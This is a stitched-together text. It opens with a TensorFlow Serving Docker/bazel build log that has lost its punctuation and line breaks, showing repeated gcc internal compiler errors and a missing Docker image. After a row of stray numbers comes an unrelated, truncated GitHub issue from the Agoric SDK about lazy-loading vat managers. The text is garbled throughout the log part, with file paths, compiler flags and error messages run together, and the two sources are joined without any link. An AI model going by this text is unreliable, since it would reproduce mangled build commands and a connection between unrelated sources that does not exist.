tensorflow core framework tensor h from external org tensorflow tensorflow core framework attr value util h from external org tensorflow tensorflow core framework node def util h from external org tensorflow tensorflow core framework shape inference h from external org tensorflow tensorflow core framework common shape fns h from external org tensorflow tensorflow core framework resource mgr h from external org tensorflow tensorflow compiler mlir tensorflow ir tf op interfaces h from external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z h from external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc external org tensorflow third party unsupported eigen src fixedpoint packetmathavx h warning ignoring attributes on template argument aka vector long long int typedef eigen packet wrapper external org tensorflow third party unsupported eigen src fixedpoint packetmathavx h warning ignoring attributes on template argument aka vector long long int typedef eigen packet wrapper in file included from external org tensorflow tensorflow core framework op kernel h from external org tensorflow tensorflow core framework resource mgr h from external org tensorflow tensorflow compiler mlir tensorflow ir tf op interfaces h from external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z h from external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc external org tensorflow tensorflow core platform env h in member function tensorflow status tensorflow env starttransaction const string tensorflow transactiontoken external org tensorflow tensorflow core platform env h warning parameter token set but not used transactiontoken token external org tensorflow tensorflow core platform env h in member function tensorflow status tensorflow env gettransactionforpath const string tensorflow transactiontoken external org tensorflow tensorflow core platform env h warning parameter token set but not used transactiontoken token in file included from external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc external org tensorflow tensorflow compiler mlir tensorflow ir tf ops helpers inc in function mlir arrayattr mlir tf anonymous shufflearrayattr mlir arrayattr llvm arrayref int external org tensorflow tensorflow compiler mlir tensorflow ir tf ops helpers inc warning comparison between signed and unsigned integer expressions for size t j j inner size j external org tensorflow tensorflow compiler mlir tensorflow ir tf ops helpers inc in function bool mlir tf anonymous arecancellablepermutations mlir denseintelementsattr mlir denseintelementsattr external org tensorflow tensorflow compiler mlir tensorflow ir tf ops helpers inc warning comparison between signed and unsigned integer expressions for int i i values size i external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc in function mlir logicalresult mlir tf verify mlir tf onehotop external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc warning comparison between signed and unsigned integer expressions axis axis axis indices ty getshape size external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc in member function mlir opfoldresult mlir tf packop fold llvm arrayref external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc warning comparison between signed and unsigned integer expressions if arg ty getrank values size return external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc in member function mlir logicalresult mlir tf padop foldoperandspermutation llvm arrayref external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc warning comparison between signed and unsigned integer expressions paddings value getnumelements permutation size external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc in function mlir logicalresult mlir tf verify mlir tf external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc warning comparison between signed and unsigned integer expressions if op num sparse sparse types count external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc warning comparison between signed and unsigned integer expressions if op sparse indices size sparse types count external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc warning comparison between signed and unsigned integer expressions if op sparse shapes size sparse types count external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc in function mlir logicalresult mlir tf anonymous verifyshapeoperandandresult mlir operation mlir type mlir type int external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc warning comparison between signed and unsigned integer expressions result ranked type getdimsize operand ranked type getshape size external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc in function mlir logicalresult mlir tf verify mlir tf spacetobatchndop external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc warning comparison between signed and unsigned integer expressions for t i i block rank i external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc warning comparison between signed and unsigned integer expressions for t i i block rank i external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc in static member function static mlir logicalresult mlir tf spacetobatchndop inferreturntypes mlir mlircontext llvm optional mlir valuerange mlir dictionaryattr mlir regionrange llvm smallvectorimpl external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc warning comparison between signed and unsigned integer expressions for t i block rank i input rank i external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc warning comparison between signed and unsigned integer expressions for t i i block rank i in file included from external org tensorflow tensorflow compiler mlir tensorflow ir tf ops n z cc external org tensorflow tensorflow compiler mlir tensorflow ir tf ops helpers inc at global scope external org tensorflow tensorflow compiler mlir tensorflow ir tf ops helpers inc warning mlir logicalresult mlir tf anonymous verifyreductioninputanddims mlir value mlir value mlir location defined but not used static logicalresult verifyreductioninputanddims value input value dims external org tensorflow tensorflow compiler mlir tensorflow ir tf ops helpers inc warning mlir arrayattr mlir tf anonymous shufflearrayattr mlir arrayattr llvm arrayref int defined but not used arrayattr shufflearrayattr arrayattr attr arrayref permutation external org tensorflow tensorflow compiler mlir tensorflow ir tf ops helpers inc warning llvm smallvector mlir tf anonymous getdataformatpermutation llvm stringref llvm stringref defined but not used smallvector getdataformatpermutation stringref from stringref to external org tensorflow tensorflow compiler mlir tensorflow ir tf ops helpers inc warning bool mlir tf anonymous canusegpudevice mlir operation defined but not used bool canusegpudevice operation op external org tensorflow tensorflow compiler mlir tensorflow ir tf ops helpers inc warning bool mlir tf anonymous canusetensorcores const mlir tf runtimedevices defined but not used bool canusetensorcores const runtimedevices devices external org tensorflow tensorflow compiler mlir tensorflow ir tf ops helpers inc warning bool mlir tf anonymous canusegpudevice const mlir tf runtimedevices defined but not used bool canusegpudevice const runtimedevices devices external org tensorflow tensorflow compiler mlir tensorflow ir tf ops helpers inc warning bool mlir tf anonymous isunknowndimorrank t defined but not used static bool isunknowndimorrank t dim or rank gcc internal compiler error killed program please submit a full bug report with preprocessed source if appropriate see for instructions error root cache bazel bazel root external org tensorflow tensorflow compiler mlir tensorflow build couldn t build file external org tensorflow tensorflow compiler mlir tensorflow objs tensorflow ops tf ops o c compilation of rule org tensorflow tensorflow compiler mlir tensorflow tensorflow ops failed exit gcc failed error executing command cd root cache bazel bazel root execroot tf serving exec env path usr local sbin usr local bin usr sbin usr bin sbin bin pwd proc self cwd python bin path usr bin usr bin gcc u fortify source fstack protector wall wunused but set parameter wno free nonheap object fno omit frame pointer d fortify source dndebug ffunction sections fdata sections std c md mf bazel out opt bin external org tensorflow tensorflow compiler mlir tensorflow objs tensorflow ops tf ops d frandom seed bazel out opt bin external org tensorflow tensorflow compiler mlir tensorflow objs tensorflow ops tf ops o dllvm enable stats d stdc limit macros d stdc constant macros d stdc format macros dllvm build global isel dtf use snappy deigen only deigen max align bytes deigen has type traits dhave sys uio h d clang support dyn annotation iquote external org tensorflow iquote bazel out opt bin external org tensorflow iquote external llvm project iquote bazel out opt bin external llvm project iquote external zlib iquote bazel out opt bin external zlib iquote external com google absl iquote bazel out opt bin external com google absl iquote external nsync iquote bazel out opt bin external nsync iquote external eigen archive iquote bazel out opt bin external eigen archive iquote external gif iquote bazel out opt bin external gif iquote external libjpeg turbo iquote bazel out opt bin external libjpeg turbo iquote external com google protobuf iquote bazel out opt bin external com google protobuf iquote external com googlesource code iquote bazel out opt bin external com googlesource code iquote external farmhash archive iquote bazel out opt bin external farmhash archive iquote external iquote bazel out opt bin external iquote external highwayhash iquote bazel out opt bin external highwayhash iquote external double conversion iquote bazel out opt bin external double conversion iquote external snappy iquote bazel out opt bin external snappy ibazel out opt bin external llvm project mlir virtual includes callopinterfacesincgen ibazel out opt bin external llvm project mlir virtual includes infertypeopinterfaceincgen ibazel out opt bin external llvm project mlir virtual includes opasminterfaceincgen ibazel out opt bin external llvm project mlir virtual includes regionkindinterfaceincgen ibazel out opt bin external llvm project mlir virtual includes sideeffectinterfacesincgen ibazel out opt bin external llvm project mlir virtual includes symbolinterfacesincgen ibazel out opt bin external llvm project mlir virtual includes derivedattributeopinterfaceincgen ibazel out opt bin external llvm project mlir virtual includes looplikeinterfaceincgen ibazel out opt bin external llvm project mlir virtual includes parsertokenkinds ibazel out opt bin external llvm project mlir virtual includes controlflowinterfacesincgen ibazel out opt bin external llvm project mlir virtual includes standardopsincgen ibazel out opt bin external llvm project mlir virtual includes vectorinterfacesincgen ibazel out opt bin external llvm project mlir virtual includes viewlikeinterfaceincgen isystem external llvm project llvm include isystem bazel out opt bin external llvm project llvm include isystem external zlib isystem bazel out opt bin external zlib isystem external llvm project mlir include isystem bazel out opt bin external llvm project mlir include isystem external nsync public isystem bazel out opt bin external nsync public isystem external eigen archive isystem bazel out opt bin external eigen archive isystem external gif isystem bazel out opt bin external gif isystem external com google protobuf src isystem bazel out opt bin external com google protobuf src isystem external farmhash archive src isystem bazel out opt bin external farmhash archive src isystem external double conversion isystem bazel out opt bin external double conversion mavx std c d glibcxx use abi fno canonical system headers wno builtin macro redefined d date redacted d timestamp redacted d time redacted c external org tensorflow tensorflow compiler mlir tensorflow ir tf ops cc o bazel out opt bin external org tensorflow tensorflow compiler mlir tensorflow objs tensorflow ops tf ops o execution platform local execution config platform platform in file included from external org tensorflow third party unsupported eigen fixedpoint from external org tensorflow tensorflow core framework numeric types h from external org tensorflow tensorflow core framework allocator h from external org tensorflow tensorflow core framework tensor h from external org tensorflow tensorflow core framework attr value util h from external org tensorflow tensorflow core framework node def util h from external org tensorflow tensorflow core framework shape inference h from external org tensorflow tensorflow core framework common shape fns h from external org tensorflow tensorflow core framework resource mgr h from external org tensorflow tensorflow compiler mlir tensorflow ir tf op interfaces h from external org tensorflow tensorflow compiler mlir tensorflow ir tf ops h from external org tensorflow tensorflow compiler mlir tensorflow ir tf ops cc external org tensorflow third party unsupported eigen src fixedpoint packetmathavx h warning ignoring attributes on template argument aka vector long long int typedef eigen packet wrapper external org tensorflow third party unsupported eigen src fixedpoint packetmathavx h warning ignoring attributes on template argument aka vector long long int typedef eigen packet wrapper in file included from external org tensorflow tensorflow core framework op kernel h from external org tensorflow tensorflow core framework resource mgr h from external org tensorflow tensorflow compiler mlir tensorflow ir tf op interfaces h from external org tensorflow tensorflow compiler mlir tensorflow ir tf ops h from external org tensorflow tensorflow compiler mlir tensorflow ir tf ops cc external org tensorflow tensorflow core platform env h in member function tensorflow status tensorflow env starttransaction const string tensorflow transactiontoken external org tensorflow tensorflow core platform env h warning parameter token set but not used transactiontoken token external org tensorflow tensorflow core platform env h in member function tensorflow status tensorflow env gettransactionforpath const string tensorflow transactiontoken external org tensorflow tensorflow core platform env h warning parameter token set but not used transactiontoken token gcc internal compiler error killed program please submit a full bug report with preprocessed source if appropriate see for instructions error root cache bazel bazel root external org tensorflow tensorflow core kernels build couldn t build file external org tensorflow tensorflow core kernels objs cwise op cwise op equal to o c compilation of rule org tensorflow tensorflow core kernels cwise op failed exit gcc failed error executing command cd root cache bazel bazel root execroot tf serving exec env path usr local sbin usr local bin usr sbin usr bin sbin bin pwd proc self cwd python bin path usr bin usr bin gcc u fortify source fstack protector wall wunused but set parameter wno free nonheap object fno omit frame pointer d fortify source dndebug ffunction sections fdata sections std c md mf bazel out opt bin external org tensorflow tensorflow core kernels objs cwise op cwise op equal to d frandom seed bazel out opt bin external org tensorflow tensorflow core kernels objs cwise op cwise op equal to o dcurl staticlib dplatform linux denable curl client dopenssl is boringssl dtf use snappy dhave sys uio h d clang support dyn annotation deigen only deigen max align bytes deigen has type traits iquote external org tensorflow iquote bazel out opt bin external org tensorflow iquote external com google absl iquote bazel out opt bin external com google absl iquote external nsync iquote bazel out opt bin external nsync iquote external eigen archive iquote bazel out opt bin external eigen archive iquote external gif iquote bazel out opt bin external gif iquote external libjpeg turbo iquote bazel out opt bin external libjpeg turbo iquote external com google protobuf iquote bazel out opt bin external com google protobuf iquote external zlib iquote bazel out opt bin external zlib iquote external com googlesource code iquote bazel out opt bin external com googlesource code iquote external farmhash archive iquote bazel out opt bin external farmhash archive iquote external iquote bazel out opt bin external iquote external highwayhash iquote bazel out opt bin external highwayhash iquote external double conversion iquote bazel out opt bin external double conversion iquote external snappy iquote bazel out opt bin external snappy iquote external curl iquote bazel out opt bin external curl iquote external boringssl iquote bazel out opt bin external boringssl iquote external jsoncpp git iquote bazel out opt bin external jsoncpp git iquote external aws iquote bazel out opt bin external aws iquote external aws c common iquote bazel out opt bin external aws c common iquote external aws c event stream iquote bazel out opt bin external aws c event stream iquote external aws checksums iquote bazel out opt bin external aws checksums isystem external nsync public isystem bazel out opt bin external nsync public isystem external eigen archive isystem bazel out opt bin external eigen archive isystem external gif isystem bazel out opt bin external gif isystem external com google protobuf src isystem bazel out opt bin external com google protobuf src isystem external zlib isystem bazel out opt bin external zlib isystem external farmhash archive src isystem bazel out opt bin external farmhash archive src isystem external double conversion isystem bazel out opt bin external double conversion isystem external curl include isystem bazel out opt bin external curl include isystem external boringssl src include isystem bazel out opt bin external boringssl src include isystem external jsoncpp git include isystem bazel out opt bin external jsoncpp git include isystem external aws aws cpp sdk core include isystem bazel out opt bin external aws aws cpp sdk core include isystem external aws aws cpp sdk include isystem bazel out opt bin external aws aws cpp sdk include isystem external aws aws cpp sdk transfer include isystem bazel out opt bin external aws aws cpp sdk transfer include isystem external aws c common include isystem bazel out opt bin external aws c common include isystem external aws c event stream include isystem bazel out opt bin external aws c event stream include isystem external aws checksums include isystem bazel out opt bin external aws checksums include mavx std c d glibcxx use abi dmlir generated gpu kernels enabled deigen avoid stl array iexternal gemmlowp wno sign compare ftemplate depth fno exceptions dtensorflow monolithic build pthread fno canonical system headers wno builtin macro redefined d date redacted d timestamp redacted d time redacted c external org tensorflow tensorflow core kernels cwise op equal to cc o bazel out opt bin external org tensorflow tensorflow core kernels objs cwise op cwise op equal to o execution platform local execution config platform platform in file included from external org tensorflow third party unsupported eigen fixedpoint from external org tensorflow tensorflow core framework numeric types h from external org tensorflow tensorflow core framework allocator h from external org tensorflow tensorflow core framework op kernel h from external org tensorflow tensorflow core kernels cwise ops common h from external org tensorflow tensorflow core kernels cwise op equal to cc external org tensorflow third party unsupported eigen src fixedpoint packetmathavx h warning ignoring attributes on template argument aka vector long long int typedef eigen packet wrapper external org tensorflow third party unsupported eigen src fixedpoint packetmathavx h warning ignoring attributes on template argument aka vector long long int typedef eigen packet wrapper in file included from external org tensorflow tensorflow core framework op kernel h from external org tensorflow tensorflow core kernels cwise ops common h from external org tensorflow tensorflow core kernels cwise op equal to cc external org tensorflow tensorflow core platform env h in member function tensorflow status tensorflow env starttransaction const string tensorflow transactiontoken external org tensorflow tensorflow core platform env h warning parameter token set but not used transactiontoken token external org tensorflow tensorflow core platform env h in member function tensorflow status tensorflow env gettransactionforpath const string tensorflow transactiontoken external org tensorflow tensorflow core platform env h warning parameter token set but not used transactiontoken token gcc internal compiler error killed program please submit a full bug report with preprocessed source if appropriate see for instructions error root cache bazel bazel root external org tensorflow tensorflow core kernels build couldn t build file external org tensorflow tensorflow core kernels objs cwise op cwise op select o c compilation of rule org tensorflow tensorflow core kernels cwise op failed exit gcc failed error executing command cd root cache bazel bazel root execroot tf serving exec env path usr local sbin usr local bin usr sbin usr bin sbin bin pwd proc self cwd python bin path usr bin usr bin gcc u fortify source fstack protector wall wunused but set parameter wno free nonheap object fno omit frame pointer d fortify source dndebug ffunction sections fdata sections std c md mf bazel out opt bin external org tensorflow tensorflow core kernels objs cwise op cwise op select d frandom seed bazel out opt bin external org tensorflow tensorflow core kernels objs cwise op cwise op select o dcurl staticlib dplatform linux denable curl client dopenssl is boringssl dtf use snappy dhave sys uio h d clang support dyn annotation deigen only deigen max align bytes deigen has type traits iquote external org tensorflow iquote bazel out opt bin external org tensorflow iquote external com google absl iquote bazel out opt bin external com google absl iquote external nsync iquote bazel out opt bin external nsync iquote external eigen archive iquote bazel out opt bin external eigen archive iquote external gif iquote bazel out opt bin external gif iquote external libjpeg turbo iquote bazel out opt bin external libjpeg turbo iquote external com google protobuf iquote bazel out opt bin external com google protobuf iquote external zlib iquote bazel out opt bin external zlib iquote external com googlesource code iquote bazel out opt bin external com googlesource code iquote external farmhash archive iquote bazel out opt bin external farmhash archive iquote external iquote bazel out opt bin external iquote external highwayhash iquote bazel out opt bin external highwayhash iquote external double conversion iquote bazel out opt bin external double conversion iquote external snappy iquote bazel out opt bin external snappy iquote external curl iquote bazel out opt bin external curl iquote external boringssl iquote bazel out opt bin external boringssl iquote external jsoncpp git iquote bazel out opt bin external jsoncpp git iquote external aws iquote bazel out opt bin external aws iquote external aws c common iquote bazel out opt bin external aws c common iquote external aws c event stream iquote bazel out opt bin external aws c event stream iquote external aws checksums iquote bazel out opt bin external aws checksums isystem external nsync public isystem bazel out opt bin external nsync public isystem external eigen archive isystem bazel out opt bin external eigen archive isystem external gif isystem bazel out opt bin external gif isystem external com google protobuf src isystem bazel out opt bin external com google protobuf src isystem external zlib isystem bazel out opt bin external zlib isystem external farmhash archive src isystem bazel out opt bin external farmhash archive src isystem external double conversion isystem bazel out opt bin external double conversion isystem external curl include isystem bazel out opt bin external curl include isystem external boringssl src include isystem bazel out opt bin external boringssl src include isystem external jsoncpp git include isystem bazel out opt bin external jsoncpp git include isystem external aws aws cpp sdk core include isystem bazel out opt bin external aws aws cpp sdk core include isystem external aws aws cpp sdk include isystem bazel out opt bin external aws aws cpp sdk include isystem external aws aws cpp sdk transfer include isystem bazel out opt bin external aws aws cpp sdk transfer include isystem external aws c common include isystem bazel out opt bin external aws c common include isystem external aws c event stream include isystem bazel out opt bin external aws c event stream include isystem external aws checksums include isystem bazel out opt bin external aws checksums include mavx std c d glibcxx use abi dmlir generated gpu kernels enabled deigen avoid stl array iexternal gemmlowp wno sign compare ftemplate depth fno exceptions dtensorflow monolithic build pthread fno canonical system headers wno builtin macro redefined d date redacted d timestamp redacted d time redacted c external org tensorflow tensorflow core kernels cwise op select cc o bazel out opt bin external org tensorflow tensorflow core kernels objs cwise op cwise op select o execution platform local execution config platform platform in file included from external org tensorflow third party unsupported eigen fixedpoint from external org tensorflow tensorflow core framework numeric types h from external org tensorflow tensorflow core framework register types h from external org tensorflow tensorflow core kernels cwise op select cc external org tensorflow third party unsupported eigen src fixedpoint packetmathavx h warning ignoring attributes on template argument aka vector long long int typedef eigen packet wrapper external org tensorflow third party unsupported eigen src fixedpoint packetmathavx h warning ignoring attributes on template argument aka vector long long int typedef eigen packet wrapper in file included from external org tensorflow tensorflow core framework op kernel h from external org tensorflow tensorflow core kernels cwise ops common h from external org tensorflow tensorflow core kernels cwise op select cc external org tensorflow tensorflow core platform env h in member function tensorflow status tensorflow env starttransaction const string tensorflow transactiontoken external org tensorflow tensorflow core platform env h warning parameter token set but not used transactiontoken token external org tensorflow tensorflow core platform env h in member function tensorflow status tensorflow env gettransactionforpath const string tensorflow transactiontoken external org tensorflow tensorflow core platform env h warning parameter token set but not used transactiontoken token gcc internal compiler error killed program please submit a full bug report with preprocessed source if appropriate see for instructions error root cache bazel bazel root external org tensorflow tensorflow core kernels linalg build couldn t build file external org tensorflow tensorflow core kernels linalg objs matrix square root op matrix square root op o c compilation of rule org tensorflow tensorflow core kernels linalg matrix square root op failed exit gcc failed error executing command cd root cache bazel bazel root execroot tf serving exec env path usr local sbin usr local bin usr sbin usr bin sbin bin pwd proc self cwd python bin path usr bin usr bin gcc u fortify source fstack protector wall wunused but set parameter wno free nonheap object fno omit frame pointer d fortify source dndebug ffunction sections fdata sections std c md mf bazel out opt bin external org tensorflow tensorflow core kernels linalg objs matrix square root op matrix square root op d frandom seed bazel out opt bin external org tensorflow tensorflow core kernels linalg objs matrix square root op matrix square root op o dcurl staticlib dplatform linux denable curl client dopenssl is boringssl dhave sys uio h dtf use snappy d clang support dyn annotation deigen only deigen max align bytes deigen has type traits iquote external org tensorflow iquote bazel out opt bin external org tensorflow iquote external com google absl iquote bazel out opt bin external com google absl iquote external nsync iquote bazel out opt bin external nsync iquote external eigen archive iquote bazel out opt bin external eigen archive iquote external gif iquote bazel out opt bin external gif iquote external libjpeg turbo iquote bazel out opt bin external libjpeg turbo iquote external com google protobuf iquote bazel out opt bin external com google protobuf iquote external zlib iquote bazel out opt bin external zlib iquote external com googlesource code iquote bazel out opt bin external com googlesource code iquote external farmhash archive iquote bazel out opt bin external farmhash archive iquote external iquote bazel out opt bin external iquote external highwayhash iquote bazel out opt bin external highwayhash iquote external double conversion iquote bazel out opt bin external double conversion iquote external snappy iquote bazel out opt bin external snappy iquote external curl iquote bazel out opt bin external curl iquote external boringssl iquote bazel out opt bin external boringssl iquote external jsoncpp git iquote bazel out opt bin external jsoncpp git iquote external aws iquote bazel out opt bin external aws iquote external aws c common iquote bazel out opt bin external aws c common iquote external aws c event stream iquote bazel out opt bin external aws c event stream iquote external aws checksums iquote bazel out opt bin external aws checksums isystem external nsync public isystem bazel out opt bin external nsync public isystem external eigen archive isystem bazel out opt bin external eigen archive isystem external gif isystem bazel out opt bin external gif isystem external com google protobuf src isystem bazel out opt bin external com google protobuf src isystem external zlib isystem bazel out opt bin external zlib isystem external farmhash archive src isystem bazel out opt bin external farmhash archive src isystem external double conversion isystem bazel out opt bin external double conversion isystem external curl include isystem bazel out opt bin external curl include isystem external boringssl src include isystem bazel out opt bin external boringssl src include isystem external jsoncpp git include isystem bazel out opt bin external jsoncpp git include isystem external aws aws cpp sdk core include isystem bazel out opt bin external aws aws cpp sdk core include isystem external aws aws cpp sdk include isystem bazel out opt bin external aws aws cpp sdk include isystem external aws aws cpp sdk transfer include isystem bazel out opt bin external aws aws cpp sdk transfer include isystem external aws c common include isystem bazel out opt bin external aws c common include isystem external aws c event stream include isystem bazel out opt bin external aws c event stream include isystem external aws checksums include isystem bazel out opt bin external aws checksums include mavx std c d glibcxx use abi deigen avoid stl array iexternal gemmlowp wno sign compare ftemplate depth fno exceptions dtensorflow monolithic build pthread fno canonical system headers wno builtin macro redefined d date redacted d timestamp redacted d time redacted c external org tensorflow tensorflow core kernels linalg matrix square root op cc o bazel out opt bin external org tensorflow tensorflow core kernels linalg objs matrix square root op matrix square root op o execution platform local execution config platform platform in file included from external org tensorflow third party unsupported eigen fixedpoint from external org tensorflow tensorflow core framework types h from external org tensorflow tensorflow core framework kernel def builder h from external org tensorflow tensorflow core kernels linalg matrix square root op cc external org tensorflow third party unsupported eigen src fixedpoint packetmathavx h warning ignoring attributes on template argument aka vector long long int typedef eigen packet wrapper external org tensorflow third party unsupported eigen src fixedpoint packetmathavx h warning ignoring attributes on template argument aka vector long long int typedef eigen packet wrapper in file included from external org tensorflow tensorflow core framework op kernel h from external org tensorflow tensorflow core kernels linalg matrix square root op cc external org tensorflow tensorflow core platform env h in member function tensorflow status tensorflow env starttransaction const string tensorflow transactiontoken external org tensorflow tensorflow core platform env h warning parameter token set but not used transactiontoken token external org tensorflow tensorflow core platform env h in member function tensorflow status tensorflow env gettransactionforpath const string tensorflow transactiontoken external org tensorflow tensorflow core platform env h warning parameter token set but not used transactiontoken token gcc internal compiler error killed program please submit a full bug report with preprocessed source if appropriate see for instructions error root cache bazel bazel root external org tensorflow tensorflow core kernels build couldn t build file external org tensorflow tensorflow core kernels objs bias op bias op o c compilation of rule org tensorflow tensorflow core kernels bias op failed exit gcc failed error executing command cd root cache bazel bazel root execroot tf serving exec env path usr local sbin usr local bin usr sbin usr bin sbin bin pwd proc self cwd python bin path usr bin usr bin gcc u fortify source fstack protector wall wunused but set parameter wno free nonheap object fno omit frame pointer d fortify source dndebug ffunction sections fdata sections std c md mf bazel out opt bin external org tensorflow tensorflow core kernels objs bias op bias op d frandom seed bazel out opt bin external org tensorflow tensorflow core kernels objs bias op bias op o dcurl staticlib dplatform linux denable curl client dopenssl is boringssl dtensorflow use custom contraction kernel dtensorflow use mkldnn contraction kernel dhave sys uio h dtf use snappy d clang support dyn annotation deigen only deigen max align bytes deigen has type traits iquote external org tensorflow iquote bazel out opt bin external org tensorflow iquote external com google absl iquote bazel out opt bin external com google absl iquote external eigen archive iquote bazel out opt bin external eigen archive iquote external mkl dnn iquote bazel out opt bin external mkl dnn iquote external nsync iquote bazel out opt bin external nsync iquote external gif iquote bazel out opt bin external gif iquote external libjpeg turbo iquote bazel out opt bin external libjpeg turbo iquote external com google protobuf iquote bazel out opt bin external com google protobuf iquote external zlib iquote bazel out opt bin external zlib iquote external com googlesource code iquote bazel out opt bin external com googlesource code iquote external farmhash archive iquote bazel out opt bin external farmhash archive iquote external iquote bazel out opt bin external iquote external highwayhash iquote bazel out opt bin external highwayhash iquote external double conversion iquote bazel out opt bin external double conversion iquote external snappy iquote bazel out opt bin external snappy iquote external curl iquote bazel out opt bin external curl iquote external boringssl iquote bazel out opt bin external boringssl iquote external jsoncpp git iquote bazel out opt bin external jsoncpp git iquote external aws iquote bazel out opt bin external aws iquote external aws c common iquote bazel out opt bin external aws c common iquote external aws c event stream iquote bazel out opt bin external aws c event stream iquote external aws checksums iquote bazel out opt bin external aws checksums isystem external eigen archive isystem bazel out opt bin external eigen archive isystem external mkl dnn include isystem bazel out opt bin external mkl dnn include isystem external mkl dnn src isystem bazel out opt bin external mkl dnn src isystem external mkl dnn src common isystem bazel out opt bin external mkl dnn src common isystem external mkl dnn src cpu isystem bazel out opt bin external mkl dnn src cpu isystem external mkl dnn src cpu gemm isystem bazel out opt bin external mkl dnn src cpu gemm isystem external mkl dnn src cpu xbyak isystem bazel out opt bin external mkl dnn src cpu xbyak isystem external nsync public isystem bazel out opt bin external nsync public isystem external gif isystem bazel out opt bin external gif isystem external com google protobuf src isystem bazel out opt bin external com google protobuf src isystem external zlib isystem bazel out opt bin external zlib isystem external farmhash archive src isystem bazel out opt bin external farmhash archive src isystem external double conversion isystem bazel out opt bin external double conversion isystem external curl include isystem bazel out opt bin external curl include isystem external boringssl src include isystem bazel out opt bin external boringssl src include isystem external jsoncpp git include isystem bazel out opt bin external jsoncpp git include isystem external aws aws cpp sdk core include isystem bazel out opt bin external aws aws cpp sdk core include isystem external aws aws cpp sdk include isystem bazel out opt bin external aws aws cpp sdk include isystem external aws aws cpp sdk transfer include isystem bazel out opt bin external aws aws cpp sdk transfer include isystem external aws c common include isystem bazel out opt bin external aws c common include isystem external aws c event stream include isystem bazel out opt bin external aws c event stream include isystem external aws checksums include isystem bazel out opt bin external aws checksums include mavx std c d glibcxx use abi deigen avoid stl array iexternal gemmlowp wno sign compare ftemplate depth fno exceptions dtensorflow monolithic build pthread fno canonical system headers wno builtin macro redefined d date redacted d timestamp redacted d time redacted c external org tensorflow tensorflow core kernels bias op cc o bazel out opt bin external org tensorflow tensorflow core kernels objs bias op bias op o execution platform local execution config platform platform in file included from external org tensorflow third party unsupported eigen fixedpoint from external org tensorflow tensorflow core framework types h from external org tensorflow tensorflow core framework numeric op base h from external org tensorflow tensorflow core framework numeric op h from external org tensorflow tensorflow core kernels bias op cc external org tensorflow third party unsupported eigen src fixedpoint packetmathavx h warning ignoring attributes on template argument aka vector long long int typedef eigen packet wrapper external org tensorflow third party unsupported eigen src fixedpoint packetmathavx h warning ignoring attributes on template argument aka vector long long int typedef eigen packet wrapper in file included from external org tensorflow tensorflow core framework op kernel h from external org tensorflow tensorflow core framework numeric op h from external org tensorflow tensorflow core kernels bias op cc external org tensorflow tensorflow core platform env h in member function tensorflow status tensorflow env starttransaction const string tensorflow transactiontoken external org tensorflow tensorflow core platform env h warning parameter token set but not used transactiontoken token external org tensorflow tensorflow core platform env h in member function tensorflow status tensorflow env gettransactionforpath const string tensorflow transactiontoken external org tensorflow tensorflow core platform env h warning parameter token set but not used transactiontoken token gcc internal compiler error killed program please submit a full bug report with preprocessed source if appropriate see for instructions target tensorflow serving model servers tensorflow model server failed to build info elapsed time critical path info processes local failed build did not complete successfully dockerfile devel run bazel build color yes curses yes tf serving bazel options verbose failures output filter dont match anything tf serving build options tensorflow serving model servers tensorflow model server cp bazel bin tensorflow serving model servers tensorflow model server usr local bin error failed to solve rpc error code unknown desc executor failed running exit code warn no output specified for docker container driver build result will only remain in the build cache to push result image into registry use push or to load image into docker use load load build definition from dockerfile transferring dockerfile done done load dockerignore transferring context done done load metadata for docker io library ubuntu library ubuntu pull token for registry docker io done load metadata for docker io rogeryuchao tensorflow serving devel rogeryuchao tensorflow serving devel pull token for registry docker io done load metadata for docker io rogeryuchao tensorflow serving devel load metadata for docker io library ubuntu done load metadata for docker io rogeryuchao tensorflow serving devel error docker io rogeryuchao tensorflow serving devel not found load metadata for docker io rogeryuchao tensorflow serving devel error failed to solve rpc error code unknown desc failed to solve with frontend dockerfile failed to create llb definition docker io rogeryuchao tensorflow serving devel not found
0
125,021
16,700,124,731
IssuesEvent
2021-06-09 00:13:48
Agoric/agoric-sdk
https://api.github.com/repos/Agoric/agoric-sdk
closed
design vatWarehouse API for demand-paged vats
SwingSet design enhancement xsnap
## What is the Problem Being Solved? We currently maintain a `VatManager` in RAM for all non-terminated vats, both static and dynamic. These VatManager objects are tracked in `ephemeral.vats`, a Map from the vat ID string to a record that includes the manager: https://github.com/Agoric/agoric-sdk/blob/65105f795872a2928ce7d0bbe0971fa5b4c50897/packages/SwingSet/src/kernel/kernel.js#L125-L129 A new manager is created at startup (for all static+dynamic vats in the DB), and also when a new dynamic vat is created. The manager is destroyed for dynamic vats that terminate. Each time we need to deliver a message or promise resolution notification into a vat, we pull the manager off `ephemeral.vats` and use it for the delivery, with something like: ```js const vat = ephemeral.vats.get(vatID); const deliveryResult = await vat.manager.deliver(vatDelivery); ``` (look at the implementation of `deliverAndLogToVat` and `deliverToVat`, among others). We can **reduce kernel memory usage by evicting idle managers from memory**. We can **reduce overall system memory usage by terminating the corresponding workers** (e.g. telling the XS worker to exit). At startup, we can reduce memory and CPU usage by not creating managers for vats that are not yet in use (**lazy-loading vats on-demand**). There are policy / performance heuristic questions to answer: there's a tradeoff between latency and overall performance. If we correctly predict that certain vats are likely to be used right away (e.g. the fundamental economic vats, comms/vattp infrastructure), we might want to load them at startup instead of 